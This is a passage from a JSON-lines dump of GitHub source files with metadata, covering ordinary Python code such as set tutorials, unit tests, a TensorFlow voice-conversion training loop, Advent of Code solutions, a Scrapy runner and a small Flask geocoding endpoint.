X_test)\n score = a.get_accuracy_score(y_test, y_pred)\n print(f'Accuracy: {score}')\n a.save_model(classifier)\n","repo_name":"akshaykadam9/bank_note_with_FastAPI","sub_path":"ak.py","file_name":"ak.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26064241829","text":"\"\"\"\r\n Important Points::\r\n => We cannot add mutable objects (list, dict, set) as elements into set but we can add elements of immutable objects\r\n into set\r\n => We can add immutable objects (tuple) as elements into set\r\n => update() only adds the elements of sequences(list, dict, tuple, set) into set\r\n\"\"\"\r\nif __name__ == '__main__':\r\n # adding list element into set\r\n numbers_list = [5, 6, 7, 8, 9, 10]\r\n numbers_set = set([1, 2, 3, 4])\r\n\r\n numbers_set.update(numbers_list)\r\n print(numbers_set)\r\n\r\n # adding dict elements(keys, values, key:value pairs) into set\r\n names_dict = {1: 'Arslan', 2: 'Haider', 3: 'Sherazi'}\r\n names_set = set(['Waqar', 'Haider', 'Sherazi'])\r\n\r\n names_set.update(names_dict.items()) # adding key:value pairs\r\n print(names_set)\r\n names_set.update(names_dict) # adding keys\r\n print(names_set)\r\n names_set.update(names_dict.values()) # adding values\r\n print(names_set)\r\n\r\n # adding set's elements into set\r\n numbers = {1, 2, 2, 3, 4, 5, 6, 7, 8}\r\n numbers_set = set()\r\n\r\n numbers_set.update(numbers)\r\n print(numbers_set)\r\n\r\n # adding tuples as elements of set\r\n tup1 = (1, 2, 2, 3)\r\n tup2 = (4, 4, 5, 6, 7, 8)\r\n tup3 = (4, 4, 5, 6, 7, 8) # it will be discarded because of duplication\r\n numbers_set = set([tup1, tup2, tup3])\r\n print(numbers_set)\r\n\r\n for tup in numbers_set:\r\n print(tup)\r\n for ele in tup:\r\n print(ele, end=\" \")\r\n 
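# a bare print() ends each tuple's row of elements with a newline\r\n 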
print()\r\n","repo_name":"arslansherazi/python-core-code-snippets","sub_path":"3-data_structures/set/4-complex_set.py","file_name":"4-complex_set.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"9947696039","text":"import arrow\nimport pytest as pt\n\nimport src.adapters.incoming.usecases.find_pilot_use_case as uc\nfrom src.adapters.incoming.controller import FindCrewRequest\n\n\n@pt.fixture\ndef valid_request():\n depart_on = arrow.utcnow()\n return_on = arrow.utcnow().shift(days=2)\n return FindCrewRequest('Munich', depart_on, return_on)\n\n\nclass JsonDataStoreFake:\n def __init__(self, pilots=None, all_flights_by_pilot=None):\n self.all_flights_by_pilot = {\n 1: [{}, {}, {}],\n 2: [{}, {}],\n 3: [{}],\n 4: [{}, {}, {}, {}],\n } if all_flights_by_pilot is None else all_flights_by_pilot\n\n self.pilots = [{'ID': 1}, {'ID': 2}, {'ID': 3}] if pilots is None else pilots\n\n def get_pilots_for(self, _location, _depart_on, _return_on):\n return self.pilots\n\n def get_all_flights_grouped_by_pilot(self):\n return self.all_flights_by_pilot\n\n\ndef test_no_pilots_found_for_request_params(valid_request):\n pilots_for_request = []\n\n pilot = uc.find_pilot_for(JsonDataStoreFake(pilots=pilots_for_request), valid_request)\n\n assert pilot == {}\n\n\ndef test_selects_only_pilot_found(valid_request):\n pilots_for_request = [\n {\n 'ID': 2\n }\n ]\n\n pilot = uc.find_pilot_for(JsonDataStoreFake(pilots=pilots_for_request), valid_request)\n\n assert pilot == {'ID': 2}\n\n\ndef test_selects_first_pilot_if_no_flights_data(valid_request):\n pilots_for_request = [\n {\n 'ID': 1\n },\n {\n 'ID': 2\n }\n ]\n\n pilot = uc.find_pilot_for(JsonDataStoreFake(pilots=pilots_for_request, all_flights_by_pilot={}), valid_request)\n\n assert pilot == {'ID': 1}\n\n\ndef test_selects_first_pilot_unutilised(valid_request):\n pilots_for_request = [\n {\n 'ID': 1\n },\n {\n 'ID': 2\n },\n {\n 'ID': 3\n }\n ]\n\n all_flights_by_pilot = {1: [{'ID': 1}]}\n pilot = uc.find_pilot_for(JsonDataStoreFake(pilots=pilots_for_request, all_flights_by_pilot=all_flights_by_pilot), valid_request)\n\n expected_pilot_with_no_utilisation = {'ID': 2}\n assert pilot == expected_pilot_with_no_utilisation\n\n\ndef test_selects_pilot_with_least_utilisation(valid_request):\n pilots_for_request = [\n {\n 'ID': 1\n },\n {\n 'ID': 2\n }\n ]\n\n flights_by_pilot = {\n 1: [\n {'ID': 1},\n {'ID': 1},\n {'ID': 1}\n ],\n 2: [\n {'ID': 2},\n {'ID': 2}\n ]\n }\n\n pilot = uc.find_pilot_for(JsonDataStoreFake(pilots=pilots_for_request, all_flights_by_pilot=flights_by_pilot), valid_request)\n\n expected_pilot_with_least_utilisation = {'ID': 2}\n assert pilot == expected_pilot_with_least_utilisation\n\n","repo_name":"sarahabimay/flight_crew_service","sub_path":"test/adapters/incoming/find_pilot_use_case_test.py","file_name":"find_pilot_use_case_test.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36110880727","text":"#! 
/usr/bin/env python3\n\nimport os\nimport time\nimport argparse\n\nimport math\nimport random\nimport warnings\nfrom numpy import finfo\nimport numpy as np\nimport sys\nfrom debugprint import print_debug\nfrom reader import TextMelIDLoader2, myDataLoader2\nfrom hparams import create_hparams, get_root_dir\nfrom model import Parrot\nfrom model.loss import ParrotLoss\nfrom logger import ParrotLogger\nfrom manage_model import create_model, build_model, restore_checkpoint, init_checkpoint_manager\n# uses tensorflow 2.2\nimport tensorflow as tf\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras.layers import Input\n\n\ndef format_time(time_sec):\n # print time in hour:minute:second\n time_sec = int(time_sec)\n t_hour = time_sec//3600\n # time_sec = time_sec-t_hour*3600\n t_minute = (time_sec % 3600)//60\n t_sec = time_sec % 60\n t_string = str(t_hour) + ':' + str(t_minute) + ':' + str(t_sec)\n return t_string\n\n\ndef prepare_dataloaders(hparams):\n # Get data, data loaders and collate function ready\n # use mel_training_list_filtered2 and phone_training_list_filtered3\n trainset = TextMelIDLoader2(hparams.root_dir, hparams.mel_training_list_filtered,\n hparams.mel_mean_std, hparams.phone_training_list_filtered)\n valset = TextMelIDLoader2(hparams.root_dir, hparams.mel_validation_list,\n hparams.mel_mean_std, hparams.phone_validation_list)\n collate_fn = []\n\n train_loader = myDataLoader2(trainset, batch_size=hparams.batch_size)\n\n return train_loader, valset, collate_fn\n\n\ndef prepare_directories_and_logger(output_directory, log_directory):\n if not os.path.isdir(output_directory):\n os.makedirs(output_directory, exist_ok=True)\n os.chmod(output_directory, 0o775)\n logger = ParrotLogger(os.path.join(output_directory, log_directory))\n\n return logger\n\n\ndef validate(model, criterion, valset, iteration, logger, batch_size, valstep=100):\n '''Handles all the validation scoring and printing'''\n print('')\n print(\"validate model\")\n\n val_loader = myDataLoader2(valset, batch_size=batch_size)\n # val_loader.randomize()\n val_loss_tts, val_loss_vc = 0.0, 0.0\n # number of losses and accuracies\n n_losses = 7\n n_acces = 3\n reduced_val_tts_losses, reduced_val_vc_losses = (np.zeros([n_losses], dtype=np.float32),\n np.zeros([n_losses], dtype=np.float32))\n reduced_val_tts_acces, reduced_val_vc_acces = (np.zeros([n_acces], dtype=np.float32),\n np.zeros([n_acces], dtype=np.float32))\n # num_sample = random.randint(0, len(val_loader)-1)\n for step in range(0, min(len(val_loader), valstep)):\n # start = time.time()\n\n use_text = step % 2 == 0\n if step % 50 == 0:\n print('%d/%d steps' % (step+1, min(len(val_loader), valstep)), end='\\r')\n (text_input_phonelevel_padded, text_input_padded, mel_padded, mat_onehot_padded,\n expand_mat_padded, speaker_id, text_lengths, mel_lengths,\n stop_token_padded) = val_loader[step]\n\n mel_reference = [] # unused\n (mel_padded_out, mel_padded_post_out, speaker_logit_from_mel,\n speaker_logit_from_mel_hidden_text_rate,\n text_hidden, mel_hidden, mel_hidden_text_rate,\n text_logit_from_mel_hidden) = model([mel_padded, text_input_padded,\n mel_lengths, expand_mat_padded,\n mat_onehot_padded, speaker_id, mel_reference], use_text,\n training=False, do_voice_conversion=False)\n if step == 0:\n # get a randomly chosen sentence data\n mel_reference = [] # unused\n outmod = model([mel_padded, text_input_padded, mel_lengths, expand_mat_padded,\n mat_onehot_padded, speaker_id, mel_reference],\n use_text=True, training=False, do_voice_conversion=False)\n 
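# keep the first batch's targets and predictions (TTS and VC) for image logging later\n 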
mel_tts = mel_padded\n mel_tts_pred = outmod[1]\n\n outmod = model([mel_padded, text_input_padded, mel_lengths, expand_mat_padded,\n mat_onehot_padded, speaker_id, mel_reference],\n use_text=False, training=False, do_voice_conversion=False)\n mel_vc = mel_padded\n mel_vc_pred = outmod[1]\n\n # Compute the loss value for this minibatch.\n model_outputs = [mel_padded_out, mel_padded_post_out, mel_lengths, text_lengths,\n speaker_logit_from_mel, speaker_logit_from_mel_hidden_text_rate,\n expand_mat_padded, text_input_padded, text_hidden, mel_hidden, mel_hidden_text_rate,\n text_logit_from_mel_hidden, text_input_phonelevel_padded, mat_onehot_padded]\n\n targets = mel_padded\n\n loss_list, accuracy_list, combined_loss1, combined_loss2 = \\\n criterion.compute_loss(model_outputs, targets, speaker_id)\n\n if step % 2 == 0:\n val_loss_tts += combined_loss1\n reduced_val_tts_losses += np.array([val.numpy() for val in loss_list])\n reduced_val_tts_acces += np.array([acc.numpy() for acc in accuracy_list])\n else:\n val_loss_vc += combined_loss1\n reduced_val_vc_losses += np.array([val.numpy() for val in loss_list])\n reduced_val_vc_acces += np.array([acc.numpy() for acc in accuracy_list])\n\n if step % 2 == 0:\n num_tts = step/2+1\n num_vc = step/2\n else:\n num_tts = (step+1)/2\n num_vc = (step+1)/2\n\n val_loss_tts = val_loss_tts / num_tts\n val_loss_vc = val_loss_vc / num_vc\n reduced_val_tts_acces = reduced_val_tts_acces / num_tts\n reduced_val_vc_acces = reduced_val_vc_acces / num_vc\n reduced_val_tts_losses = reduced_val_tts_losses / num_tts\n reduced_val_vc_losses = reduced_val_vc_losses / num_vc\n\n print((\"Validation loss {}: TTS {:.2f} VC {:.2f}\".format(iteration, float(val_loss_tts), float(val_loss_vc))))\n logger.log_validation(val_loss_tts, reduced_val_tts_losses, reduced_val_tts_acces,\n mel_tts, mel_tts_pred, iteration, 'tts')\n logger.log_validation(val_loss_vc, reduced_val_vc_losses, reduced_val_vc_acces,\n mel_vc, mel_vc_pred, iteration, 'vc')\n print('Done!')\n\n\n# @tf.function\ndef train_step(model, criterion, tvars_main, sgd_main, tvars_sc, sgd_sc,\n batch, use_text):\n (text_input_phonelevel_padded, text_input_padded, mel_padded, mat_onehot_padded,\n expand_mat_padded, speaker_id, text_lengths, mel_lengths,\n stop_token_padded) = batch\n with tf.GradientTape(persistent=True) as tape:\n # Run the forward pass of the layer.\n # The operations that the layer applies\n # to its inputs are going to be recorded\n # on the GradientTape.\n mel_reference = [] # unused\n (mel_padded_out, mel_padded_post_out, speaker_logit_from_mel,\n speaker_logit_from_mel_hidden_text_rate,\n text_hidden, mel_hidden, mel_hidden_text_rate,\n text_logit_from_mel_hidden) = model([mel_padded, text_input_padded, mel_lengths,\n expand_mat_padded, mat_onehot_padded, speaker_id, mel_reference],\n use_text, training=True, do_voice_conversion=False)\n\n # Compute the loss value for this minibatch.\n model_outputs = [mel_padded_out, mel_padded_post_out, mel_lengths, text_lengths,\n speaker_logit_from_mel, speaker_logit_from_mel_hidden_text_rate,\n expand_mat_padded, text_input_padded, text_hidden, mel_hidden, mel_hidden_text_rate,\n text_logit_from_mel_hidden, text_input_phonelevel_padded, mat_onehot_padded]\n targets = mel_padded\n loss_list, accuracy_list, combined_loss1, combined_loss2 = \\\n criterion.compute_loss(model_outputs, targets, speaker_id)\n\n # apply gradient to all losses except speaker classifier loss\n grads = tape.gradient(combined_loss1, tvars_main)\n # gradient clipping\n # 
https://www.tensorflow.org/api_docs/python/tf/clip_by_global_norm\n # see: https://stackoverflow.com/questions/36498127/how-to-apply-gradient-clipping-in-tensorflow\n grads, grad_norm_main = tf.clip_by_global_norm(grads, hparams.grad_clip_thresh)\n sgd_main.apply_gradients(zip(grads, tvars_main))\n\n # apply gradient to speaker classifier loss\n grads = tape.gradient(combined_loss2, tvars_sc)\n sgd_sc.apply_gradients(zip(grads, tvars_sc))\n\n return loss_list, accuracy_list, combined_loss1, combined_loss2, grad_norm_main\n\n\ndef train_batch(model, criterion, tvars_main, sgd_main, tvars_sc, sgd_sc, batch,\n use_text, iteration, logger, output_directory, val_set, learning_rate, manager_checkpoint):\n valstep = 500 # maximum number of batches for validation (all of them with batch_size = 32)\n start = time.time()\n\n (loss_list, accuracy_list, combined_loss1,\n combined_loss2, grad_norm_main) = train_step(model, criterion, tvars_main,\n sgd_main, tvars_sc, sgd_sc, batch,\n use_text)\n total_loss = combined_loss1 + combined_loss2\n duration = time.time() - start\n # Log every 100 iterations.\n if use_text:\n task = 'TTS'\n else:\n task = 'VC '\n if (iteration % 100 == 0) or ((iteration-1) % 100 == 0):\n print(\"Train {} {} {:.6f}\\tGrad Norm {:.1f}\\t{:.2f}s/it\".format(task, iteration,\n float(total_loss), grad_norm_main,\n duration),\n end='\\n')\n\n if iteration > 0:\n logger.log_training(total_loss, loss_list, accuracy_list, grad_norm_main, learning_rate,\n duration, iteration, task.lower())\n\n if (iteration % hparams.iters_per_checkpoint == 0):\n save_path = manager_checkpoint.save(checkpoint_number=iteration)\n print_debug(save_path)\n validate(model, criterion, val_set, iteration, logger, hparams.batch_size,\n valstep=valstep)\n\n\ndef train(output_directory, log_directory, hparams, warmup=False):\n train_loader, val_set, _, = prepare_dataloaders(hparams)\n # we call train_batch with train_loader[step] (tts) and train_loader[step+1] (vc),\n # so len_train_loader must be even\n if len(train_loader) % 2 == 1:\n len_train_loader = len(train_loader) - 1\n else:\n len_train_loader = len(train_loader)\n\n learning_rate = hparams.learning_rate\n epochs = hparams.epochs\n\n # create and build model\n model = create_model(hparams)\n build_model(model, hparams)\n\n criterion = ParrotLoss(hparams)\n\n # optimizers\n sgd_main = optimizers.Adam(lr=tf.Variable(learning_rate))\n sgd_sc = optimizers.Adam(lr=tf.Variable(learning_rate))\n # trainable weight sets\n # split parameters into speaker classifier and the rest\n tvars_sc = model.sc_trainable_weights\n tvars_main = model.main_trainable_weights\n\n print_debug('number of main vars: %d' % len(tvars_main))\n print_debug('number of sc vars: %d' % len(tvars_sc))\n\n # ## Model Checkpoints : Initialise or Restore\n manager_checkpoint = init_checkpoint_manager(model, sgd_main, sgd_sc, output_directory,\n hparams.max_chkpt_to_keep, warmup)\n if warmup:\n # full restore of latest checkpoint\n learning_rate = sgd_main.lr.numpy()\n iteration = sgd_main.iterations.numpy()\n min_epoch = iteration // len(train_loader)\n print_debug(min_epoch)\n else:\n iteration = 0\n min_epoch = 0\n\n print_debug('eagerly? 
')\n print_debug(tf.executing_eagerly())\n\n logger = prepare_directories_and_logger(output_directory, log_directory)\n\n for epoch in range(min_epoch, min_epoch+epochs):\n print(\"\\nStart of epoch %d\" % (epoch,))\n\n epoch_tic = time.time()\n # Iterate over the batches of the dataset.\n # shuffle training sentences\n train_loader.randomize()\n for step in range(0, len_train_loader, 2):\n # ###\n # VC\n # ###\n batchvc = train_loader[step+1]\n train_batch(model, criterion, tvars_main, sgd_main, tvars_sc, sgd_sc, batchvc,\n False, iteration, logger, output_directory, val_set, learning_rate, manager_checkpoint)\n iteration += 1\n # ###\n # TTS\n # ###\n batchtts = train_loader[step]\n train_batch(model, criterion, tvars_main, sgd_main, tvars_sc, sgd_sc, batchtts,\n True, iteration, logger, output_directory, val_set, learning_rate, manager_checkpoint)\n iteration += 1\n\n print('')\n print('epoch %d, elapsed time %s' % (epoch, format_time(time.time() - epoch_tic)))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\"Train VC model\")\n parser.add_argument('-o', '--output_directory', type=str, required=True,\n help='directory to save checkpoints')\n parser.add_argument('-l', '--log_directory', type=str, default='logdir',\n help='directory to save tensorboard logs (Def: %(default)s)')\n parser.add_argument('--cpu', action=\"store_true\", help=\"do not lock a GPU, and run on CPU\")\n parser.add_argument('--hparams', type=str, default=None, help='comma separated name=value pairs')\n parser.add_argument('--db_root_dir', type=str, default=None,\n help='root dir containing the db_config.py file to be used for training, if not given this will be determined from '\n 'roots.yml located in the same directry as the present script (Def: read from db_roots.yml)',\n )\n parser.add_argument('--warmup', action=\"store_true\", help=\"use last checkpoint for warmup\")\n parser.add_argument(\"--eager_mode\", action=\"store_true\",\n help=\"disable tf.function and force running in eager mode (Def: %(default)s)\")\n\n args = parser.parse_args()\n if args.eager_mode:\n tf.config.experimental_run_functions_eagerly(True)\n\n db_root_dir = get_root_dir(config_file=os.path.join(os.path.dirname(__file__), \"db_roots.yaml\"),\n dir_tag=\"root_dir\", default_dir=args.db_root_dir)\n\n hparams = create_hparams(args.hparams, root_dir=db_root_dir)\n\n if args.cpu:\n print(\"using CPU, dev mode?\")\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"\"\n\n train(args.output_directory, args.log_directory, hparams, warmup=args.warmup)\n","repo_name":"roebel/DeepGC","sub_path":"gender_converter/train_vc.py","file_name":"train_vc.py","file_ext":"py","file_size_in_byte":14875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"16977478235","text":"#!/usr/bin/env python3\n\nimport re\n\nfrom j2toggl_core.worklog_state import WorkLogState\n\n\nclass WorkLog:\n\n def __init__(self):\n self.state = WorkLogState.Unknown\n\n self.master_id = None\n self.second_id = None\n self.key = None\n self.activity = None\n\n self.project = None\n self.description = None\n self.startTime = None\n self.endTime = None\n self.duration = None\n self.tags = None\n\n self.tooltip = None\n\n @property\n def is_invalid(self):\n result = self.key is None \\\n or self.project is None \\\n or self.activity is None \\\n or self.description is None \\\n or self.duration <= 0\n\n return 
result\n","repo_name":"OttensPavel/toggl2tempo","sub_path":"j2toggl_core/worklog.py","file_name":"worklog.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"37261598268","text":"class ListNode:\n def __init__(self, val=0, following=None):\n self.val = val\n self.next = following\n\n\nclass Solution:\n def reorderList(self, initial: ListNode) -> None:\n # Empty list\n if initial is None:\n return\n\n middle = self.half(initial)\n\n # if there si just one node\n if middle is initial:\n return\n\n # if there are only 2 nodes\n # if middle is initial.next:\n # return\n\n # cut the list into two pieces\n second_half = self.reverse(middle)\n self.merge(initial, second_half)\n\n def half(self, head: ListNode) -> ListNode:\n slow = fast = head\n prev = None\n while fast is not None and fast.next is not None:\n prev = slow\n slow = slow.next\n fast = fast.next.next\n\n if slow is fast:\n return slow\n\n if fast is not None:\n prev = prev.next\n slow = slow.next\n\n prev.next = None\n\n return slow\n\n def reverse(self, head: ListNode) -> ListNode:\n pointer = head.next\n head.next = None\n while pointer is not None:\n tmp = pointer.next\n pointer.next = head\n head, pointer = pointer, tmp\n return head\n\n def merge(self, first: ListNode, second: ListNode) -> None:\n while second is not None:\n tmp = first.next\n first.next = first = second\n second = second.next\n first.next = first = tmp\n","repo_name":"Vasilic-Maxim/LeetCode-Problems","sub_path":"problems/143. Reorder List/1 - Divide - Reverse - Merge.py","file_name":"1 - Divide - Reverse - Merge.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41322497401","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nAdvent of Code 2019, day 13.\n\n@author: James Jolley, james@jolley.co\n\"\"\"\n\nfrom day05.day05 import Computer, read_program\n\ndef part1(path):\n c = Computer(read_program(path))\n tiles = {id:set() for id in range(5)}\n while c.ram[c.ip] != 99:\n c.step()\n if len(c.out) == 3:\n x,y,tile_id = (c.out.popleft() for _ in range(3))\n tiles[tile_id].add((x,y))\n return len(tiles[2])\n\ndef part2(path):\n program = read_program(path)\n program[0] = 2\n c = Computer(program)\n score = None\n paddle = None\n ball = None\n while c.ram[c.ip] != 99:\n # when prompted for controller input, have the paddle move toward the\n # ball, if their x coordinates are different\n if c.ram[c.ip]%100 == 3:\n if paddle is None or ball is None:\n c.in_.append(0)\n elif paddle < ball:\n c.in_.append(1)\n elif paddle > ball:\n c.in_.append(-1)\n else:\n c.in_.append(0)\n c.step()\n if len(c.out) == 3:\n x,y,tile_id = (c.out.popleft() for _ in range(3))\n if (x,y) == (-1,0):\n score = tile_id\n elif tile_id == 3:\n paddle=x\n elif tile_id == 4:\n ball=x\n return score\n\n\nif __name__ == '__main__':\n print(part1('day13/input.txt'))\n print(part2('day13/input.txt'))\n\n\n","repo_name":"jolleyjames/Advent-of-Code-2019","sub_path":"day13/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"16607624757","text":"import re\n\n# Opening the file and getting two line paths\nfo = open(\"input.txt\", \"r\")\npath_a = fo.readline().strip().split(\",\")\npath_b = fo.readline().strip().split(\",\")\nfo.close()\n\n# This 
function returns a list of tuple objects for each\n# segment of the line path\n# Each object has the structure: ((x1,y1),(x2,y2))\ndef create_line_list(path: list):\n prev = (0,0)\n output = []\n for point in path:\n num = int(re.findall(r\"\\d+\", point)[0])\n if \"R\" in point:\n temp = (prev,(prev[0]+num, prev[1]))\n output.append(temp)\n prev = temp[1]\n elif \"L\" in point:\n temp = (prev,(prev[0]-num, prev[1]))\n output.append(temp)\n prev = temp[1]\n elif \"U\" in point:\n temp = (prev,(prev[0], prev[1]+num))\n output.append(temp)\n prev = temp[1]\n elif \"D\" in point:\n temp = (prev,(prev[0], prev[1]-num))\n output.append(temp)\n prev = temp[1]\n\n return output\n\n# Takes two line segments defined by p1,p2 and p3,p4 and\n# returns the x,y coordinates if they intersect or False\n# if they do not\n# Using formula from Simon Walton, Dept of Computer Science, Swansea\n# http://www.cs.swan.ac.uk/~cssimon/line_intersection.html\ndef find_intersection(p1, p2, p3, p4):\n # Unpacking for readability\n x1,y1 = p1\n x2,y2 = p2\n x3,y3 = p3\n x4,y4 = p4\n\n d_a = ((x4-x3)*(y1-y2))-((x1-x2)*(y4-y3))\n d_b = ((x4-x3)*(y1-y2))-((x1-x2)*(y4-y3))\n if d_a == 0 or d_b == 0:\n # If we reach this point, it means the lines are colinear\n # or parallel. If they're colinear, all x-coords or y-coords\n # will be the same depending on if the lines are vertical or\n # horizontal and intersect at every point where the lines overlap\n # We're dealing with a discrete system because we're using\n # Manhattan distance, so we can just return a list of all\n # integer values where the lines overlap.\n # If the x-coords or y-coords aren't all the same, then the lines\n # are just parallel and we can return False for no intersect\n\n # Vertical line\n if x1 == x2 and x1 == x3 and x1 == x4:\n y_list = [y1,y2,y3,y4]\n y_list.remove(min(y_list))\n y_list.remove(max(y_list))\n yi_1 = min(y_list)\n yi_2 = max(y_list)\n output = [(x1,y) for y in range(yi_1,yi_2)]\n return output\n # Horizontal line\n elif y1 == y2 and y1 == y3 and y1 == y4:\n x_list = [x1,x2,x3,x4]\n x_list.remove(min(x_list))\n x_list.remove(max(x_list))\n xi_1 = min(x_list)\n xi_2 = max(x_list)\n output = [(x,y1) for x in range(xi_1,xi_2)]\n return output\n # Parallel lines\n else:\n return False\n else:\n t_a = (((y3-y4)*(x1-x3))+((x4-x3)*(y1-y3)))/d_a\n t_b = (((y1-y2)*(x1-x3))+((x2-x1)*(y1-y3)))/d_b\n\n if ((0 <= t_a <= 1) and (0 <= t_b <= 1)):\n # It doesn't matter which line equation we use\n # We just need t_a and t_b to verify they do intersect\n x = int(x1 + t_a*(x2-x1))\n y = int(y1 + t_a*(y2-y1))\n return (x,y)\n else:\n return False\n \n# Finally, some easy math - https://i.imgur.com/FrVGO1F.png\n# Just calculating the Manhattan distance of each intersection\n# from the origin and returning the shortest distance\n# Removes the origin from the list of intersections because duh\ndef shortest_distance(points):\n if (0,0) in points:\n points.remove((0,0))\n distances = [(abs(x)+abs(y)) for (x,y) in points]\n return min(distances)\n\na_lines = create_line_list(path_a)\nb_lines = create_line_list(path_b)\n\nintersections = []\nfor line_a in a_lines:\n for line_b in b_lines:\n intersect = find_intersection(line_a[0], line_a[1], line_b[0], line_b[1])\n # Can receive either a single point or a list of points back\n if isinstance(intersect, tuple):\n intersections.append(intersect)\n elif isinstance(intersect, list):\n 
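# a colinear overlap comes back as a list of shared lattice points, so extend rather than append\n 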
intersections.extend(intersect)\n\nprint(shortest_distance(intersections))\n","repo_name":"mason-wooley/advent-of-code","sub_path":"2019/day-03/day-03-1.py","file_name":"day-03-1.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71181213193","text":"# coding=utf-8\n\nfrom multiprocessing import Queue, Process\nfrom scrapy.utils.project import get_project_settings\n\nfrom twisted.internet import reactor\nfrom scrapy.crawler import CrawlerProcess\n\nfrom shop.spiders.markethot_spider import MarkethotSpider\nfrom shop.spiders.megadrop24_spider import Megadrop24Spider\nfrom shop.spiders.yandex_spider import YandexSpider\nfrom web.manage import runserver\n\n\nclass CrawlRunner:\n def __init__(self, query, history):\n self.query = query\n self.history = history\n\n def run_spider(self):\n def f(q, spider):\n try:\n runner = CrawlerProcess(get_project_settings())\n deferred = runner.crawl(spider, query=self.query, history=self.history)\n deferred.addBoth(lambda _: reactor.stop())\n reactor.run()\n q.put(None)\n except Exception as e:\n q.put(e)\n\n for spider in [Megadrop24Spider, MarkethotSpider]:\n q = Queue()\n p = Process(target=f, args=(q, spider))\n p.start()\n result = q.get()\n p.join()\n\n if result is not None:\n raise result\n\n\nif __name__ == '__main__':\n runserver()","repo_name":"tromario/shop-spider","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34225583383","text":"from flask import Flask, request, jsonify\nfrom flask_cors import CORS\nimport osmnx as ox\n\napp = Flask(__name__)\nCORS(app, origins='http://localhost:54102')\n\n@app.get('/get-geocode')\ndef get_geocode():\n address = request.args.get('address')\n \n # if address is not provided with status 400\n if address is None:\n return \"address not found\", 400\n \n # getcode the address, if invalid return an invalid message with status 400\n try:\n coordinate = ox.geocode(address)\n except ValueError:\n return \"invalid address\", 400\n \n geoData = {\"coordinate\": {\n \"lat\": coordinate[0],\n \"lon\": coordinate[1]\n }}\n \n # success return json with status 200\n return jsonify(geoData), 200\n\n# set to port 3000 for now since mac uses port 5000\nif __name__ == \"__main__\":\n app.run(debug=True, port=54101, host=\"0.0.0.0\")","repo_name":"algebra2boy/Ree-See.it","sub_path":"geo-service/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"13337268195","text":"import sys\r\n\r\nimport math\r\n\r\n\r\nclass Screen:\r\n def __init__(self, dimensions):\r\n self._screen = [[['\\x00', '\\x00', '\\x00'] for i in range(dimensions.width)] for j in range(dimensions.height)]\r\n\r\n def render(self, universe, cursor):\r\n self._screen = [[age_to_colour(cell) for cell in row] for row in universe.render()]\r\n self._screen[cursor.y][cursor.x][0] = '\\xff'\r\n\r\n rendered = \"\".join(\"\".join(\"\".join(cell) for cell in row) for row in self._screen)\r\n sys.stdout.write(rendered)\r\n sys.stdout.flush()\r\n\r\n\r\ndef age_to_colour(age):\r\n if age == 0:\r\n return ['\\x00', '\\x00', '\\x00']\r\n else:\r\n unitary = math.pow(1.8, float(- age + 1) / 10)\r\n green = int(math.floor(unitary * 0xff))\r\n blue = int(math.floor((1 - unitary) * 0xff))\r\n return 
['\\x00', chr(green), chr(blue)]\r\n","repo_name":"hgcummings/floorcade","sub_path":"games/conway/conway/screen.py","file_name":"screen.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"73423487112","text":"from typing import Any, Dict, List, Type, TypeVar, Union\n\nimport attr\n\nfrom ..models.keyfactor_api_models_workflows_parameter_definition_response_control_type import (\n KeyfactorApiModelsWorkflowsParameterDefinitionResponseControlType,\n)\nfrom ..models.keyfactor_api_models_workflows_parameter_definition_response_depends_on import (\n KeyfactorApiModelsWorkflowsParameterDefinitionResponseDependsOn,\n)\nfrom ..models.keyfactor_api_models_workflows_parameter_definition_response_parameter_type import (\n KeyfactorApiModelsWorkflowsParameterDefinitionResponseParameterType,\n)\nfrom ..models.keyfactor_api_models_workflows_parameter_definition_response_potential_values import (\n KeyfactorApiModelsWorkflowsParameterDefinitionResponsePotentialValues,\n)\nfrom ..types import UNSET, Unset\n\nT = TypeVar(\"T\", bound=\"KeyfactorApiModelsWorkflowsParameterDefinitionResponse\")\n\n\n@attr.s(auto_attribs=True)\nclass KeyfactorApiModelsWorkflowsParameterDefinitionResponse:\n \"\"\"\n Attributes:\n display_name (Union[Unset, str]):\n parameter_type (Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponseParameterType]):\n required (Union[Unset, bool]):\n default_value (Union[Unset, str]):\n control_type (Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponseControlType]):\n potential_values (Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponsePotentialValues]):\n support_token_replacement (Union[Unset, bool]):\n depends_on (Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponseDependsOn]):\n \"\"\"\n\n display_name: Union[Unset, str] = UNSET\n parameter_type: Union[Unset, 